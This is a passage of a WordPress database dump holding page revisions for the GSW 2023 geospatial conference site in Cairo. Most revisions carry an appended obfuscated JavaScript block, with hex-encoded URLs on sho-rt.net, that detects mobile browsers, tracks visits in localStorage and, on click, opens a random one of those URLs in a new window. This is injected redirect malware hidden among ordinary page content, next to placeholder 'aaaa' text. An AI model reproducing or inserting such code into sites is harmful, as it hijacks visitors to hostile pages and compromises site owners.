_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:34:18','2022-11-09 15:34:18','',3066,'https://gsw2023.com/?p=3143',0,'revision','',0),
(3144,1,'2022-11-09 15:35:16','2022-11-09 15:35:16','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_position=\"0% 50%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"2275\" css=\".vc_custom_1668008113047{padding-bottom: 50px !important;}\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668007819032{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668007827903{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:35:16','2022-11-09 15:35:16','',3066,'https://gsw2023.com/?p=3144',0,'revision','',0),
(3145,1,'2022-11-09 15:43:22','2022-11-09 15:43:22','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" 